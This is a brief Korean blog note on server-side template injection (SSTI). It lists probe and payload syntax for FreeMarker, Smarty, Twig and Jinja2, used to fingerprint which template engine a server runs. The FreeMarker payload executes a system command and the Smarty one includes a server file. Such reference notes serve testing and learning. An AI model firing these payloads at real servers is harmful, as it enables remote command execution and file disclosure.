메뉴 닫기

SSTI(Server-Side Template Injection)

SSTI 엔진 확인방법

아래 내용은 정리하고 있는 SSTI 종류별 문법으로 실제 테스트 해봐야한다.

  • FreeMarker
    • <#assign ex=”freemarker.template.utility.Execute”?new()> ${ ex(“cat file”) }
      해당 내용은 #assign ex를 통해 변수를 선언하고 Execute 인스턴스를 생성하여 시스템 명령어를 실행하는 것이다.
  • Smarty
    • {include file=’/file’}
  • Twig
    • {{7*’7′}} = 49
  • Jinja2
    • {{7*’7′}} = 7777777
0 0 votes
Article Rating
구독
Notify of
guest

0 Comments
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x